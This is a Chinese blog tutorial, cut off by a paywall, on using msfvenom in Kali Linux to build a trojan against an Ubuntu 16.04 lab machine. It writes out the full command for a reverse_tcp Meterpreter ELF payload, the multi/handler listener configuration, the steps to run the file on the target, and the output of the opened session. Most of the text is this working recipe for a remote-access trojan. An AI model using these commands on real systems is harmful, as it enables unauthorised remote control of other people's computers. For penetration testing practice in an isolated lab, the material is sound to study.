本文介绍了如何在Kali Linux环境下,使用Msfvenom工具生成针对Ubuntu 16.04 64位系统的反向连接和正向连接木马。详细步骤包括选择合适的载荷,设置反弹或绑定的IP和端口,生成可执行文件,并在靶机上执行以建立连接。同时,列举了一些meterpreter下的常用命令。
环境
攻击机:Kali Linux 2020.1 172.16.252.129
靶机:Ubuntu 16.04 172.16.252.138
生成反向连接木马
使用kali自带的Msfvenom工具生成木马。
查看有哪些linux下的载荷:
msfvenom -l payloads | grep linux
针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_tcp载荷,并指定反弹连接的IP和端口,生成elf类型的木马:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.252.129 LPORT=1234 -f elf > shell.elf
打印以下信息:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
在当前目录已经生成了shell.elf文件。
打开监听
接下来运行msfconsole:
msfconsole
输入以下指令,指定监听攻击模块,载荷,IP,端口:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 172.16.252.129
set lport 1234
exploit
最后一行exploit可以换成run。
运行木马
修改之前生成的shell.elf属性为可执行:
chmod a+x shell.elf
将其拷贝到靶机Ubuntu 16.04中运行:
./shell.elf
这时kali端打印出:
[*] Started reverse TCP handler on 172.16.252.129:1234
[*] Sending stage (3021284 bytes) to 172.16.252.138
[*] Meterpreter session 2 opened (172.16.252.129:1234 -> 172.16.252.138:56384) at 2020-04-20 07:04:26 -0400
正向连接木马
类似上面的反向连接木马,可以使用bind_tcp载荷,开启正向连接木马。和反向连接的区别在于:
反向连接木马是攻击机开放端口,靶机连过来;
正向连接木马是
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
